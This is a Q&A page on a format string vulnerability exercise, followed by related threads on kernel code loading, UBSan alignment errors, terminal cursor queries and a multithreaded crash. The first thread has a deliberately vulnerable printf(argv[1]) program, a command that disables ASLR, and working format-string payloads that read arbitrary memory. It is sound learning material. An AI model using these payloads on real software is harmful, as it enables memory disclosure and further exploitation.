Format String Vulnerability exercise - c

I'm trying to exploit a format string vulnerability just for exercise but something is going wrong. My goal is to exploit such a bug in order to read from a certain address chosen by me.
This is the code I'm trying to exploit:
#include <stdio.h>
void main(int argv, char *argv[]){
printf(argv[1]);
}
This program is running on a x86 machine mounting a 2.6.20 linux kernel.
I'm tring to print the bytes stored at the address 0x80483cb, which belongs to the code section:
...
80483cb: e8 e8 fe ff ff call 80482b8 <printf#plt>
80483cb: e8 e8 fe ff ff call 80482b8 <printf#plt>
80483d0: 83 c4 10 add $0x10,%esp
80483d3: b8 00 00 00 00 mov $0x0,%eax
...
Just to be sure I've also disabled the ASLR with:
echo 0 > /proc/sys/kernel/randomize_va_space
I've found the exact location where to store the memory address doing:
./print AAAA`perl -e 'print "%08x."x141'`
AAAA00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.
bffff108.b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.
bffff0b0.b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.
b7ff66b0.b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.
08048440.b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2ac.bffff2b4.00000000.bffff57a.bffff5dd.
bffff5f1.bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.
bffff711.bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.
bffffce7.bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.
bfffff0a.bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.
bfffffb7.bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.
078bfbff.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.
00000007.00000007.b7fea000.00000008.00000000.00000009.080482d0.0000000b.00000000.0000000c.
00000000.0000000d.00000000.0000000e.00000000.00000017.00000000.0000000f.bffff29b.00000000.
00000000.00000000.00000000.00000000.69000000.00363836.00000000.00000000.00000000.72702f2e.
00746e69.41414141.
Finally I tried to print the above bytes doing:
./print $(printf "\xcb\x83\x04\x08")`perl -e 'print "%08x."x140 . "%s"'`
But what I got is a fault before to be able to see those bytes:
00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.bffff108.
b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.bffff0b0.
b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.b7ff66b0.
b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.08048440.
b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2af.bffff2b7.00000000.bffff57a.bffff5dd.bffff5f1.
bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.bffff711.
bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.bffffce7.
bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.bfffff0a.
bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.bfffffb7.
bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.078bfbff.
00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.
00000007.b7fea000.00000008.000Segmentationfault
What I expected was to get on screen a set of chars which are the bytes from the address used until the first \x00, What am I doing wrong?

This would work if you wouldn't change the length of your argument.
You remove one %08x. and add one %s. This makes your input 3 bytes shorter, effectively changing the stack layout. So you are likely not hitting the right address anymore.
I recommend writing a small script that will always pad your string to a fixed size. This helps to avoid such changes.
Keep in mind that changing your environment ($PWD (cd ..), adding/removing environment variables, etc.) will also change the stack layout. Resetting the environment can be of help here (env -i).
Here is a run of the vuln program without changing the length of the argument:
$ ./nagga $(printf "\x41\x41\x41\x41")XXperl -e 'print "%x."x118 . "%x"';
AAAAXX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.c1a6169f.f6a2b28f.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f4000000.2b137f67.69b01f05.93944d19.697a2611.363836.0.616e2f2e.616767.41414141
$ ./nagga $(printf "\x70\x84\x04\x08")XXperl -e 'print "%x."x118 . "%s"';
p�XX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.187cff94.2f785b84.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f000000.5f19366a.9135f3e8.e60e0ac6.69afc87d.363836.0.616e2f2e.616767.�Ë$Ð���������U��S�������t��f����Ћ���u���[]Ð�S��r
Works as expected.

Related

Reading data pointed to by an address

working on my reversing skillset here and I came upon something I thought i understood but I managed to confuse myself.
Working in C mainly
My function returns me an address for the information I want to access.
LRESULT ret = SendMessage(hComboBox, CB_GETITEMDATA, (WPARAM)0 , (LPARAM) 0);
// the exact function doesn't really matter here.
printf("Address: %p\n", ret); // Output is 09437DF8
A dump of this address results in
09437DF8 A0 55 E8 12
This is the address (note endianness) of the data I really want to read.
12e855A0
12 E8 55 A0 - 30 00 3A 00 30 00 33 00 3A 00 32 00 32 00 00 00 - UNICODE "0:03:22"
Now I'm fairly certain this is just basic pointers/referencing/de-referencing but i cant wrap my head what I have to do to read this value pragmatically.
wprintf(L"%s\n", <value at address pointed to by ret>);
// Yes its a null terminated string
// Im working via injected dll, so no access violations
// string is unicode
Perhaps something like this?
#include <stdio.h>
#include <wchar.h>
int main()
{
wchar_t *name = L"UNICODE String";
void **ret = (void **)&name;
wprintf(L"%ls \n", *(wchar_t **)ret);
return 0;
}

Dynamic C code execution: memory references

tl;dr : I'm trying to execute dynamically some code from another snippet. But I am stuck with handling memory reference (e.g. mov 40200b, %rdi): can I patch my code or the snippet running code so that 0x40200b is resolved correctly (as the offset 200b from the code)?
To generate the code to be executed dynamically I start from a (kernel) object and I resolve the references using ld.
#!/usr/bin/python
import os, subprocess
if os.geteuid() != 0:
print('Run this as root')
exit(-1)
with open("/proc/kallsyms","r") as f:
out=f.read()
sym= subprocess.Popen( ['nm', 'ebbchar.ko', '-u' ,'--demangle', '-fposix'],stdout=subprocess.PIPE)
v=''
for sym in sym.stdout:
s = " "+ sym.split()[0]+ "\n"
off = out.find(s)
v += "--defsym "+s.strip() + "=0x" +out[off-18:off -2]+" "
print(v)
os.system("ld ebbchar.ko "+ v +"-o ebbchar.bin");
I then transmit the code to be executed with through a mmaped file
int fd = open(argv[1], O_RDWR | O_SYNC);
address1 = mmap(NULL, page_size, PROT_WRITE|PROT_READ , MAP_SHARED, fd, 0);
int in=open(argv[2],O_RDONLY);
sz= read(in, buf+8,BUFFER_SIZE-8);
uint64_t entrypoint=atol(argv[3]);
*((uint64_t*)buf)=entrypoint;
write(fd, buf, min(sz+8, (size_t) BUFFER_SIZE));
I execute code dynamycally with this code
struct mmap_info *info;
copy_from_user((void*)(&info->offset),buf,8);
copy_from_user(info->data, buf+8, sz-8);
unsigned long (*func)(void) func= (void*) (info->data + info->offset);
int ret= func();
This approch work for code that don't access memory such as "\x55\x48\x89\xe5\xc7\x45\xf8\x02\x00\x00\x00\xc7\x45\xfc\x03\x00\x00\x00\x8b\x55\xf8\x8b\x45\xfc\x01\xd0\x5d\xc3" but I have problems when memory is involved.
See example below.
Let's assume i wan't execute dynamically the function vm_close. Objdump -d -S returns:
0000000000401017 <vm_close>:
{
401017: e8 e4 07 40 81 callq ffffffff81801800 <__fentry__>
printk(KERN_INFO "vm_close");
40101c: 48 c7 c7 0b 20 40 00 mov $0x40200b,%rdi
401023: e9 b6 63 ce 80 jmpq ffffffff810e73de <printk>
At execution, my function pointer points to the right code:
(gdb) x/12x $rip
0xffffc90000c0601c: 0x48 0xc7 0xc7 0x0b 0x20 0x40 0x00 0xe9
0xffffc90000c06024: 0xb6 0x63 0xce 0x80
(gdb) x/2i $rip
=> 0xffffc90000c0601c: mov $0x40200b,%rdi
0xffffc90000c06023: jmpq 0xffffc8ff818ec3de
BUT, this code will fail since:
1) In my context $0x40200b points at the physical address $0x40200b, and not offset 200b from the beginning of the code.
2) I don't understand why but the address displayed there is actually different from the correct one (0xffffc8ff818ec3de != ffffffff810e73de) so it won't point on my symbol and will crash.
Is there a way to solve my 2 issues?
Also, I had trouble to find good documentation related to my issue (low-level memory resolution), if you could give me some, that would really help me.
Edit: Since I run the code in the kernel I cannot simply compile the code with -fPIC or -fpie which is not allowed by gcc (cc1: error: code model kernel does not support PIC mode)
Edit 24/09:
According to #Peter Cordes comment, I recompiled it adding mcmodel=small -fpie -mno-red-zone -mnosse to the Makefile (/lib/modules/$(uname -r)fixed/build/Makefile)
This is better than in the original version since the generated code before linking is now:
0000000000000018 <vm_close>:
{
18: ff 15 00 00 00 00 callq *0x0(%rip) # 1e <vm_close+0x6>
printk(KERN_INFO "vm_close");
1e: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # 25 <vm_close+0xd>
25: e8 00 00 00 00 callq 2a <vm_close+0x12>
}
2a: c3 retq So thanks to rip-relative addressing
Thus I’m now able to access the other variables on my script…
Thus, after linking I can successfully access my variable embedded within the buffer.
40101e: 48 8d 3d e6 0f 00 00 lea 0xfe6(%rip),%rdi # 40200b
Still, one problem remains:
The symbol I want to access (printk) and my executable buffer are in different address spaces, for exemple:
printk=0xffffffff810e73de:
Executable_buffer=0xffffc9000099d000
But in my callq to printk, I have only 32 bits to write the address to call as an offset from $rip since there is no .got section in the kernel. This means that printk has to be located within [$rip-2GO, $rip+2GO]. But this is not the case there.
Do I have a way to access the printk address although they are located more than 2GO away from my buffer (I tried to used mcmodel=medium but I haven't seen any difference in the generated code), for instance by modifying gcc options so that the binary actually have a .got section?
Or is there a reliable way to force my executable and potentially-too large-for-kmalloc buffer to be allocated in the [0xffffffff00000000 ; 0xffffffffffffffff] range? (I currently use __vmalloc(BUFFER_SIZE, GFP_KERNEL, PAGE_KERNEL_EXEC); )
Edit 27/09:
I succedded in allocationg my buffer in the [0xffffffff00000000 ; 0xffffffffffffffff] range using the non exported __vmalloc_node_range function as a (dirty) hack.
IMPORTED(__vmalloc_node_range)(BUFFER_SIZE, MODULE_ALIGN,
MODULES_VADDR + get_module_load_offset(),
MODULES_END, GFP_KERNEL,
PAGE_KERNEL_EXEC, 0, NUMA_NO_NODE,
__builtin_return_address(0));
Then, when I know the address of my executable buffer and the address of the kernel symbols (by parsing /proc/kallsyms), I can patch my binary using ld’s option --defsym symbol=relative_address where relative_address = symbol_address - buffer_offset .
Despite being extremely dirt, this approach actually works.
But I need to relink my binary each time I execute it since the buffer may (and will) be allocated at a different address. To solve this issue, I think the best way would be to build my executable as a real position independent executable so that I can just patch the global offset table and not fully relink the module.
But with the options provided there I got a rip-relative address but no got/plt. So I'd like to find a way to build my module as a proper PIE.
This post is getting huge, messy and we are deviating from the original question. Thus, I opened a new simplified post there. If I get interesting answers, I'll edit this post to explain them.
Note: For the sake of simplicity, safety tests are not displayed there
Note 2: I am perfectly aware that my PoC is very unusual and can be a bad practice but I'd like to do it anyway.

UBSan: Store to misaligned address; what is the problem, and should I care

I've been running some code under UBSan, and found an error which I've never seen before:
/usr/include/c++/7/bits/stl_algobase.h:324:8: runtime error: store to misaligned address 0x611000001383 for type 'struct complex', which requires 4 byte alignment
0x611000001383: note: pointer points here
66 46 40 02 00 00 00 00 00 00 00 00 04 01 18 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00
^
(g++-7.3.0, Ubuntu 18.04, flags -fsanitize=address -fsanitize=undefined)
What does this error mean? Is it truly an error (it is in the standard library, so it can't be too bad, right?), and should I care about it?
You probably use a pointer cast which casts a block of raw memory to a complex*.
Example:
void* raw = getBuffer(); // Made up function which returns a buffer
auto size = *static_cast<uint16_t>*(raw); // Maybe your format says that you got a 2 Byte size in front
auto* array = static_cast<complex*>(raw+sizeof(uint16_t)); // ... and complex numbers after
std::transform(array, array+size, ...); // Pass this into STL
Boom! You got UB.
Why?
The behavior is undefined in the following circumstances: [...]
Conversion between two pointer types produces a result that is incorrectly aligned
[...]
If the resulting pointer is not correctly aligned [68] for the referenced type, the behavior is undefined.
See https://stackoverflow.com/a/46790815/1930508 (where I got these from)
What does it mean?
Every pointer must be aligned to the type it is pointing to. For complex this means an alignment of 4. In short this means that array (from above) must be evenly divisible by 4 (aka array % 4 == 0) Assuming that raw is aligned to 4 bytes you can easily see that array cannot as (raw + 2) % 4 == 2 (because of raw % 4 == 2)
If the size would be a 4-Byte value, then array would have been aligned if (and only if) raw was aligned. Whether this is guaranteed depends on where it comes from.
So yes this is truly an error and may lead to a real bug although not always (depending on moon phase etc. as it is always with UB, see the answer above for details)
And no it is NOT in the STL, it just happens to be detected there because UBSAN watches memory dereferences. So while the actual UB is the static_cast<complex*> it is only detected when reading from that pointer.
You can use export UBSAN_OPTIONS=print_stacktrace=1 prior to executing the program to get a stacktrace and find out where your wrong cast is.
Tip: You only need to check casts. Any struct/type allocated via new is always aligned (and every member inside), unless tricks like "packed structs" are used.

How to count letters before cursor in bash using linux c?

For example , "[root#localhost ~]# asd" , the number before cursor should be strlen("[root#localhost ~]# asd" ) , while the cursor is after letter 'd' .
You could call some of the functions provided in the bash headers, as shown in this blog post.
It might be as simple as something like:
#include <config.h>
#include "../bashtypes.h"
#include <stdio.h>
#include "../bashintl.h"
#include "../shell.h"
#include "common.h"
...
int getPS1Len () {
char *ps1 = get_string_value ("PS1");
if (ps1 != 0) {
ps1 = decode_prompt_string (ps1);
if (ps1 != 0) {
return strlen(ps1);
}
}
return 0;
}
...
(Totally untested code, copied with some changes from the linked post.)
If you're using the linux console or a VT-100 emulator with similar emulation (konsole and xterm, for example), then you can query the current cursor position by writing the following ECMA-48 control sequence to the terminal.
ESC [ 6 n
where ESC is hexadecimal code 1b. The terminal will respond with the sequence:
ESC [ ## ; ## R
where the first ## is the row number and the second ## is the column number of the cursor location, both expressed as decimal numbers without leading zeros.
Here's an example, to show how it works (no C code, just shell):
$ IFS= read -p "This is a prompt: "$'\e[6n' -dR -rs CURSOR; read -r RESPONSE
This is a prompt: Hello, world!
$ hd <<<"$CURSOR"
00000000 1b 5b 33 38 3b 31 39 0a |.[38;19.|
00000008
$ hd <<<"$RESPONSE"
00000000 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 21 0a |Hello, world!.|
0000000e
The first command-line, consisting of two read commands does the following:
Print the string This is a prompt: followed by the cursor query console code. (-p PROMPT command-line option to read)
Read the input up to the first R (-dR command-line option), storing it in the shell variable CURSOR. This input is not echoed back to the terminal (-s command-line option).
Read a line of input, storing it in the shell variable RESPONSE
From the query response stored in CURSOR, you can see that the cursor (prior to my typing Hello, world!) was at column 19 of row 38.
You could do exactly the same thing from the inside of a programmable-completion function, for example. I'm not sure how else you could run a program in the middle of terminal input, but if you can figure out how to run a program, that program can issue the cursor position query and read the query report, as above.

Process Coredumped but does not look like illegal reference in a multithreaded program

Backtrace of the coredump:
#0 0x0000000000416228 in add_to_epoll (struct_fd=0x18d32760, lno=7901) at lbi.c:7092
#1 0x0000000000418b54 in connect_fc (struct_fd=0x18d32760, type=2) at lbi.c:7901
#2 0x0000000000418660 in poll_fc (arg=0x0) at lbi.c:7686
#3 0x00000030926064a7 in start_thread () from /lib64/libpthread.so.0
#4 0x0000003091ed3c2d in clone () from /lib64/libc.so.6
Code Snippet:
#define unExp(x) __builtin_expect((x),0)
...
7087 int add_to_epoll( struct fdStruct * struct_fd, int lno)
7088 {
7089 struct epoll_event ev;
7090 ev.events = EPOLLIN | EPOLLET | EPOLLPRI | EPOLLERR ;
7091 ev.data.fd = fd_st->fd;
7092 if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd, EPOLL_CTL_ADD, struct_fd->fd,&ev) == -1))
7093 {
7094 perror("client FD ADD to epoll error:");
7095 return -1;
7096 }
7097 else
7098 {
...
7109 }
7110 return 1;
7111 }
Disassembly of the offending line. I am not good at interpreting assembly code but have tried my best:
if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd, EPOLL_CTL_ADD, stuct_fd->fd,&ev) == -1))
416210: 48 8b 45 d8 mov 0xffffffffffffffd8(%rbp),%rax // Storing struct_fd->fd
416214: 8b 10 mov (%rax),%edx // to EDX
416216: 48 8b 45 d8 mov 0xffffffffffffffd8(%rbp),%rax // Storing struct_fd->Hdr->info->epollfd
41621a: 48 8b 80 e8 01 00 00 mov 0x1e8(%rax),%rax // to EDI which failed
416221: 48 8b 80 58 01 00 00 mov 0x158(%rax),%rax // while trying to offset members of the structure
416228: 8b 78 5c mov 0x5c(%rax),%edi // <--- failed here since Reg AX is 0x0
41622b: 48 8d 4d e0 lea 0xffffffffffffffe0(%rbp),%rcx
41622f: be 01 00 00 00 mov $0x1,%esi
416234: e8 b7 e1 fe ff callq 4043f0 <epoll_ctl#plt>
416239: 83 f8 ff cmp $0xffffffffffffffff,%eax
41623c: 0f 94 c0 sete %al
41623f: 0f b6 c0 movzbl %al,%eax
416242: 48 85 c0 test %rax,%rax
416245: 74 5e je 4162a5 <add_to_epoll+0xc9>
Printing out Registers and struct member values:
(gdb) i r $rax
rax 0x0 0
(gdb) p struct_fd
$3 = (struct fdStruct *) 0x18d32760
(gdb) p struct_fd->Hdr
$4 = (StHdr *) 0x3b990f30
(gdb) p struct_fd->Hdr->info
$5 = (struct Info *) 0x3b95b410 // Strangely, this is NOT NULL. Inconsistent with assembly dump.
(gdb) p ev
$6 = {events = 2147483659, data = {ptr = 0x573dc648000003d6, fd = 982, u32 = 982, u64= 6286398667419026390}}
Please let me know if my dis-assembly interpretation is OK. And if yes, would like to understand why gdb not showing NULL when it is printing out the structure members.
OR if the analysis is not perfect would like to know the actual reason of coredump. Please let me know if you need more info.
Thanks
---- The following part has been added Later ----
The proxy is a multithreaded program. Doing more digging came to know that when the problem occurs the following two thread were running in parallel. And when I avoid the two functions to run parallely the problem never occurs. But, the thing is I cannot explain how this behavior results into the original problematic scene:
Thread 1:
------------------------------------------------------------
int new_connection() {
...
struct_fd->Hdr->info=NULL; /* (line 1) */
...
<some code>
...
struct_fd->Hdr->info=Golbal_InFo_Ptr; /* (line 2) */ // This is a malloced memory, once allocated never freed
...
...
}
------------------------------------------------------------
Thread 2 executing add_to_epoll():
------------------------------------------------------------
int add_to_epoll( struct fdStruct * struct_fd, int lno)
{
...
if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd,...) /* (line 3) */
...
}
------------------------------------------------------------
In the above snippets if execution is done in the order,
LIne 1,
Line 3,
Line 2,
the scene can occur. What I expect is whenever an illegal reference is encountered it should dump immediately without trying to execute LINE 3 which makes it NON NULL.
It is a definite behavior because till now I have got around 12 coredumps of the same problem, all showing the exact same thing.
It is clear that struct_fd->Hdr->info is NULL, as Per Johansson already answered.
However, GDB thinks that it is not. How could that be?
One common way this happens, is when
you change the layout of struct fdStruct, struct StHdr (or both),
and
you neglect to rebuild all objects that use these definitions
The disassembly shows that offsetof(struct fdStruct, Hdr) == 0x1e8 and offsetof(struct StHdr, info) == 0x158. See what GDB prints for the following:
(gdb) print/x (char*)&struct_fd->Hdr - (char*)struct_fd
(gdb) print/x (char*)&struct_fd->Hdr->info - (char*)struct_fd->Hdr
I bet it would print something other than 0x1e8 and 0x158.
If that's the case, make clean && make may fix the problem.
Update:
(gdb) print/x (char*)&struct_fd->Hdr - (char*)struct_fd
$1 = 0x1e8
(gdb) print/x (char*)&struct_fd->Hdr->info - (char*)struct_fd->Hdr
$3 = 0x158
This proves that GDB's idea of how objects are laid out in memory matches compiled code.
We still don't know whether GDB's idea of the value of struct_fd matches reality. What do these commands print?
(gdb) print struct_fd
(gdb) x/gx $rbp-40
They should produce the same value (0x18d32760). Assuming they do, the only other explanation I can think of is that you have multiple threads accessing struct_fd, and the other thread overwrites the value that used to be NULL with the new value.
I just noticed your update to the question ;-)
What I expect is whenever an illegal reference is encountered it should dump immediately without trying to execute LINE 3 which makes it NON NULL.
Your expectation is incorrect: on any modern CPU, you have multiple cores, and your threads are executing simultaneously. That is, you have this code (time goes down along Y axis):
char *p; // global
Time CPU0 CPU1
0 p = NULL
1 if (*p) p = malloc(1)
2 *p = 'a';
...
At T1, CPU0 traps into the OS, but CPU1 continues. Eventually, the OS processes hardware trap, and dumps memory state at that time. On CPU1, hundreds of instructions may have executed after T1. The clocks between CPU0 and CPU1 aren't even synchronized, they don't necessarily go in lock-step.
Moral of the story: don't access global variables from multiple threads without proper locking.
The C line part of the disassembly does not match the one in the original code. But clearly
struct_fd->Hdr->info
is NULL. gdb shouldn't have a problem printing that, but it does sometimes get confused when the code is compiles with -O2 or higher.

Resources